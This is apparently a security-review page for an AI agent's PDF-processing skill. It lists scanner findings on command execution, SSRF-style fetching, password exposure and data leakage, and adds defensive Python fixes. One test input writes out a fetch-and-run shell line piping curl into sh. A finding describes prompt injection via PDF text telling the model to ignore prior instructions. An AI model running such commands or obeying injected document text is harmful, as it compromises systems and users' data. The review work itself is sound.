PR's PDF Agent

Security checks across malware telemetry and agentic risk

Overview

This PDF skill mostly does what it claims, but it has under-disclosed features that can fetch URLs, run user-supplied LLM commands, and expose PDF passwords through local process arguments.

Review before installing in sensitive environments. Use it only on PDFs and URLs you trust, avoid the translate feature for confidential documents unless you control the LLM backend, do not use --llm-cmd with untrusted commands, and be aware that PDF passwords may be visible to other local users or monitoring tools while qpdf runs.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger Abuse: Overly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • MCP Least Privilege: Underdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
Findings (11)

Lp3

Severity: Medium
Category: MCP Least Privilege
Confidence: 88%
Finding
The skill advertises executable capabilities including shell, file read/write, environment access, and network behavior, yet the manifest does not declare permissions or clearly bound those powers. This weakens sandboxing and user consent, making it easier for an agent or downstream user to invoke risky operations without realizing the full trust boundary.

Tp4

Severity: High
Category: MCP Tool Poisoning
Confidence: 94%
Finding
The documented purpose presents a narrow self-hosted PDF tool, but the behavior includes natural-language agent planning, external LLM integration, translation via external providers, and remote HTTP/HTTPS fetching. That mismatch can cause operators to grant trust appropriate for offline PDF processing while the skill actually interprets prompts, reaches external services, and processes remote content, substantially increasing attack surface and data exfiltration risk.

Context-Inappropriate Capability

Severity: Medium
Confidence: 72%
Finding
The helper exposes broad arbitrary external command execution capability that exceeds the stated PDF-focused purpose of the skill. Even if this file does not itself show attacker-controlled input reaching the helper, such a generic primitive materially increases the attack surface because other parts of the skill can use it to run non-PDF commands, bypass intended scope, or invoke risky binaries with inherited permissions.

Context-Inappropriate Capability

Severity: Medium
Confidence: 93%
Finding
This code permits arbitrary external command execution when `provider == "command"` by accepting a caller-supplied `cmd` string, splitting it, and executing the result via `run_cmd`. Although it does not invoke a shell, it still allows execution of any local program, and it can pass untrusted prompt data either on stdin or interpolated into arguments, which is dangerous if an attacker can influence the configuration or the request parameters.
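The following is an added illustration, not code from the skill itself, of how the `provider == "command"` path can be narrowed to what a PDF tool actually needs. It keeps an operator-maintained allowlist of LLM front-ends with fixed argv templates, rejects any `--llm-cmd` value that adds tokens or names an unlisted binary, and feeds the prompt on stdin so it never becomes an argument. The backend names and flags in `ALLOWED_LLM_COMMANDS` are assumptions; `build_argv_unsafe` reproduces the split-and-run pattern the finding describes for contrast.

```python
import shlex
import subprocess
from typing import Dict, List

# Allowlist of local LLM front-ends the operator is willing to run. The keys are
# the only values --llm-cmd may carry; the argv templates are fixed here rather
# than assembled from caller input. Binaries and flags are assumptions: adjust
# them to the backend you actually deploy.
ALLOWED_LLM_COMMANDS: Dict[str, List[str]] = {
    "ollama": ["ollama", "run", "llama3"],
    "llama-cli": ["llama-cli", "-m", "/opt/models/model.gguf", "-f", "/dev/stdin"],
}


class CommandNotAllowed(ValueError):
    """Raised when --llm-cmd names something outside the allowlist."""


def build_argv_unsafe(cmd: str, prompt: str) -> List[str]:
    """The pattern the finding describes: split whatever the caller supplied and
    append the prompt. Any local program runs, and the prompt is an argument."""
    return cmd.split() + [prompt]


def resolve_llm_command(requested: str) -> List[str]:
    """Map an --llm-cmd value to a fixed argv, rejecting anything not allowlisted.

    Extra tokens are rejected rather than appended, so a config file or request
    parameter cannot smuggle in additional flags or swap in another binary.
    """
    tokens = shlex.split(requested)
    if not tokens:
        raise CommandNotAllowed("empty --llm-cmd")
    if tokens[0] not in ALLOWED_LLM_COMMANDS:
        raise CommandNotAllowed(f"{tokens[0]!r} is not an allowlisted LLM command")
    if len(tokens) > 1:
        raise CommandNotAllowed("extra arguments to --llm-cmd are not permitted")
    return list(ALLOWED_LLM_COMMANDS[tokens[0]])


def generate_text_command(prompt: str, requested: str, timeout: float = 300.0) -> str:
    """Run the allowlisted backend with the prompt on stdin.

    The prompt never becomes an argv element, so prompt text that looks like a
    flag ("--output /etc/cron.d/x") or contains shell metacharacters cannot
    change what is executed; it is only data the model reads.
    """
    argv = resolve_llm_command(requested)
    proc = subprocess.run(
        argv,
        input=prompt,
        capture_output=True,
        text=True,
        timeout=timeout,
        check=True,
    )
    return proc.stdout


if __name__ == "__main__":
    # Constructed inputs: both are rejected before anything is executed.
    for bad in ("bash -c 'curl evil | sh'", "ollama run other-model"):
        try:
            resolve_llm_command(bad)
        except CommandNotAllowed as exc:
            print("rejected:", exc)
    print("would run:", resolve_llm_command("ollama"))
```

Passing the prompt on stdin also keeps it out of `ps` output and shell history, which matters when the prompt carries the full text of a document.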

Context-Inappropriate Capability

Severity: Medium
Confidence: 89%
Finding
The fallback path performs arbitrary outbound HTTP(S) requests when the input looks like a URL. In a 'self-hosted PDF operations' skill, this expands the trust boundary from local conversion into network retrieval, which can enable SSRF-style access to internal services, unexpected data exfiltration paths, or policy violations if untrusted users control the source parameter.

Description-Behavior Mismatch

Severity: Medium
Confidence: 94%
Finding
The function sends the full PDF-extracted content to `generate_text`, which may route the data to an external, provider-backed LLM even though the skill is presented as self-hosted PDF operations. This is a real confidentiality and trust-boundary issue, because users may reasonably expect local-only handling of document contents, especially for sensitive PDFs.

Missing User Warnings

Severity: Medium
Confidence: 86%
Finding
The code silently issues outbound network requests for URL inputs without any explicit disclosure or opt-in. In a self-hosted environment, this can surprise operators, violate network isolation expectations, and amplify the SSRF risk created by accepting attacker-controlled URLs.
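The two findings above (the SSRF-style fetch and the missing opt-in) can be addressed together. The code below is an added example written for this page, not the skill's own fetch path. It requires an explicit `allow_remote` opt-in, accepts only `https`, rejects credentials in the URL, resolves the host and refuses any non-public address (loopback, RFC 1918, link-local such as 169.254.169.254, CGNAT, IPv4-mapped IPv6), connects to the vetted IP rather than re-resolving the name (closing the DNS-rebinding window), refuses redirects, caps the response size, and checks the `%PDF-` magic. Names such as `fetch_pdf` and the `pdf-skill` User-Agent are assumptions.

```python
import http.client
import ipaddress
import socket
import ssl
from typing import List
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"https"}          # plain http stays off unless the operator enables it
MAX_PDF_BYTES = 50 * 1024 * 1024     # refuse to buffer more than this
CONNECT_TIMEOUT = 20


class UnsafeUrl(ValueError):
    """The URL points somewhere a self-hosted PDF tool should not fetch from."""


def is_public_address(ip: str) -> bool:
    """True only for globally routable unicast addresses.

    Loopback, RFC 1918, link-local (including the 169.254.169.254 metadata
    endpoint), CGNAT (100.64/10), multicast and unspecified all return False.
    IPv4-mapped IPv6 (::ffff:10.0.0.1) is unwrapped so it cannot bypass the check.
    """
    addr = ipaddress.ip_address(ip)
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return addr.is_global and not addr.is_multicast


def check_url(url: str) -> List[str]:
    """Validate scheme and host, resolve the name, and require every address to be public."""
    parts = urlparse(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise UnsafeUrl(f"scheme {parts.scheme!r} not allowed")
    if not parts.hostname:
        raise UnsafeUrl("missing host")
    if parts.username or parts.password:
        raise UnsafeUrl("credentials in URL are not allowed")
    port = parts.port or 443
    try:
        infos = socket.getaddrinfo(parts.hostname, port, proto=socket.IPPROTO_TCP)
    except socket.gaierror as exc:
        raise UnsafeUrl(f"cannot resolve {parts.hostname}: {exc}") from exc
    ips = sorted({info[4][0] for info in infos})
    for ip in ips:
        if not is_public_address(ip):
            raise UnsafeUrl(f"{parts.hostname} resolves to non-public address {ip}")
    return ips


def fetch_pdf(url: str, allow_remote: bool = False) -> bytes:
    """Fetch a remote PDF only with an explicit opt-in and only from a public host.

    The TCP connection goes to the address that passed the check, not to the
    hostname again, so a rebinding DNS answer between check and use does not
    help an attacker. Redirects are refused because a 302 to an internal host
    would otherwise reopen the hole.
    """
    if not allow_remote:
        raise PermissionError("remote fetch is disabled; pass allow_remote=True to enable it")
    parts = urlparse(url)
    ips = check_url(url)
    host, port = parts.hostname, parts.port or 443
    raw = socket.create_connection((ips[0], port), timeout=CONNECT_TIMEOUT)
    ctx = ssl.create_default_context()
    tls = ctx.wrap_socket(raw, server_hostname=host)   # certificate is still checked against the name
    conn = http.client.HTTPSConnection(host, port, timeout=CONNECT_TIMEOUT)
    conn.sock = tls                                    # reuse the pinned, verified socket
    path = parts.path or "/"
    if parts.query:
        path += "?" + parts.query
    conn.request("GET", path, headers={"Host": host, "User-Agent": "pdf-skill"})
    resp = conn.getresponse()
    if 300 <= resp.status < 400:
        raise UnsafeUrl(f"redirect to {resp.getheader('Location')!r} not followed")
    if resp.status != 200:
        raise RuntimeError(f"HTTP {resp.status}")
    body = resp.read(MAX_PDF_BYTES + 1)
    if len(body) > MAX_PDF_BYTES:
        raise RuntimeError("response exceeds size limit")
    if not body.startswith(b"%PDF-"):
        raise RuntimeError("response is not a PDF")
    return body
```

If the deployment legitimately needs to reach internal hosts, replace `is_public_address` with an explicit hostname allowlist rather than loosening the address classes; the opt-in flag should surface in the skill's documentation and CLI help so operators know a URL argument means a network request.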

Missing User Warnings

Severity: Medium
Confidence: 94%
Finding
The unlock operation passes the PDF password directly on the command line via `--password=...`. Command-line arguments are often visible to other local users through process listings, shell history, logs, crash reports, or monitoring tools, which can expose sensitive credentials during execution. In a self-hosted PDF tool, users may reasonably supply real document passwords, so this handling creates a genuine secret-leakage risk.

Missing User Warnings

Severity: Medium
Confidence: 95%
Finding
The protect operation invokes `qpdf --encrypt` with both user and owner passwords as positional command-line arguments. This exposes encryption credentials through the process table and related telemetry, weakening the confidentiality of protected PDFs and potentially allowing unauthorized access or policy bypass if another user or service can observe the command while it runs. The skill's purpose—PDF protection—makes safe password handling especially important, so the context increases the significance of the issue.
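For both qpdf findings above, the fix is to keep passwords out of argv. The example below is added here and is not the skill's code. For unlock it uses qpdf's `--password-file=FILE` option (qpdf reads the first line of the file) with a 0600 temporary file that is removed as soon as qpdf returns; for protect it uses qpdf's `@-` argument-file syntax, which reads the argument list from standard input one argument per line, so both passwords travel over a pipe only the child process can read. Check the argument-file details against the documentation of the qpdf version you ship. The `*_leaky` builder reproduces the pattern the finding describes so the two can be compared.

```python
import os
import shutil
import subprocess
import tempfile
from typing import List, Optional, Tuple


def unlock_argv_leaky(src: str, dst: str, password: str) -> List[str]:
    """The pattern the finding describes: the password sits in argv for the life
    of the qpdf process, readable via ps, /proc/<pid>/cmdline and audit logs."""
    return ["qpdf", f"--password={password}", "--decrypt", src, dst]


def unlock_argv(src: str, dst: str, password_file: str) -> List[str]:
    """Decrypt with the password read from a file; argv only carries the path."""
    return ["qpdf", f"--password-file={password_file}", "--decrypt", src, dst]


def protect_args_via_stdin(src: str, dst: str, user_pw: str, owner_pw: str,
                           key_bits: int = 256) -> Tuple[List[str], str]:
    """Build an encrypt invocation with neither password in argv.

    Returns the argv to execute ("qpdf @-") and the text to feed on stdin.
    Because qpdf's argument files are line-separated, a newline inside a
    password would split it into two arguments, so those are refused.
    """
    for pw in (user_pw, owner_pw):
        if "\n" in pw or "\r" in pw:
            raise ValueError("newlines in a password would be read as argument separators")
    stdin_args = ["--encrypt", user_pw, owner_pw, str(key_bits), "--", src, dst]
    return ["qpdf", "@-"], "\n".join(stdin_args) + "\n"


def run_qpdf(argv: List[str], stdin: Optional[str] = None) -> Optional[int]:
    """Run qpdf if it is installed and return its exit status (None when absent)."""
    if shutil.which("qpdf") is None:
        return None
    return subprocess.run(argv, input=stdin, text=True, check=False).returncode


def unlock(src: str, dst: str, password: str) -> Optional[int]:
    """Write the password to a 0600 temp file, run qpdf, then delete the file.

    mkstemp creates the file with mode 0600, so only the invoking user (and
    root) can read it, and it exists only for the duration of the qpdf run.
    """
    fd, path = tempfile.mkstemp(prefix="qpdf-pw-")
    try:
        with os.fdopen(fd, "w") as fh:
            fh.write(password + "\n")
        return run_qpdf(unlock_argv(src, dst, path))
    finally:
        os.unlink(path)


def protect(src: str, dst: str, user_pw: str, owner_pw: str) -> Optional[int]:
    argv, stdin = protect_args_via_stdin(src, dst, user_pw, owner_pw)
    return run_qpdf(argv, stdin)


def password_in_argv(argv: List[str], password: str) -> bool:
    """Helper for checking an invocation before it runs."""
    return any(password in arg for arg in argv)
```

The temporary file is the residual exposure in the unlock path: keep `TMPDIR` on a private filesystem and make sure nothing logs its contents. Passing the whole argument list via `@-` is the cleaner option and works for unlock as well when the decrypt password is supplied as `--password=...` on stdin instead of argv.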

Missing User Warnings

Severity: Medium
Confidence: 91%
Finding
The code extracts all text from the PDF and sends it to the LLM without any visible warning, disclosure, or consent mechanism. For documents containing personal, regulated, or confidential information, this can lead to unintended data exfiltration to third-party services and violate user expectations or compliance requirements.

Ssd 1

Severity: Medium
Confidence: 89%
Finding
Untrusted PDF text is concatenated directly into the translation prompt, so document content can include prompt-injection instructions such as requests to ignore prior instructions, transform output format, or append attacker-chosen text. While this code only appears to request translated text, prompt injection can still corrupt output integrity, trigger policy-violating responses, or manipulate downstream workflows that trust the translation result.

VirusTotal

64/64 vendors flagged this skill as clean.

View on VirusTotal